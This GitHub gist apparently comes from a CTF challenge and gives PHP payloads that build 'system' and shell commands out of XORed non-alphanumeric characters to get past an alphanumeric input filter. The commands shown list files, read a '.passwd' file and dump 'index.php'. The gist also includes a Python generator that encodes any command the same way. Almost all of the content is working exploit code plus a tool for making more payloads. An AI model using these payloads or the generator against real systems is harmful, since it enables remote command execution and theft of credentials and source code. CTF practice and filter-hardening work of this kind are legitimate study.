Created
February 18, 2019 08:21
-
-
Save suryadana/0045a3a0dfe606965e078926c814e5d8 to your computer and use it in GitHub Desktop.
Another CTF challenge playing with xor to bypass filter alphanumeric.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $_=("@"^"3").("@"^"9").("@"^"3").("@"^"4").("@"^"%").("@"^"-"); | |
| $__=("@"^",").("@"^"3")." -".("@"^"!").("@"^",").("["^"3"); // ls -alh | |
| $__=("["^"8").("@"^"!").("@"^"4")." .".("@"^"0").("@"^"!").("@"^"3").("@"^"3").("@"^"7").("@"^"$") // cat .passwd | |
| $__=("["^"8").("@"^"!").("@"^"4")." ".("["^"2").("^"^"0").("@"^"$").("]"^"8").("@"^"8").".".("@"^"0").("["^"3").("@"^"0"); // cat index.php | |
| $_($__); | |
| $_=("@"^"3").("@"^"9").("@"^"3").("@"^"4").("@"^"%").("@"^"-");$__=("["^"8").("@"^"!").("@"^"4")." ".("["^"2").("^"^"0").("@"^"$").("]"^"8").("@"^"8").".".("@"^"0").("["^"3").("@"^"0");$_($__); | |
| $_=("@"^"3").("@"^"9").("@"^"3").("@"^"4").("@"^"%").("@"^"-");$__=("["^"8").("@"^"!").("@"^"4")." .".("@"^"0").("@"^"!").("@"^"3").("@"^"3").("@"^"7").("@"^"$");$_($__); | |
| # generator payload | |
| rest = "" | |
| for i in "cat .passwd": | |
| for item in string.printable: | |
| res = chr(ord(i)^ord(item)) | |
| if res not in string.ascii_letters+'`' and item not in string.ascii_letters+'`': | |
| rest += '("{0}"^"{1}").'.format(res, item) | |
| break | |
| print(rest) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment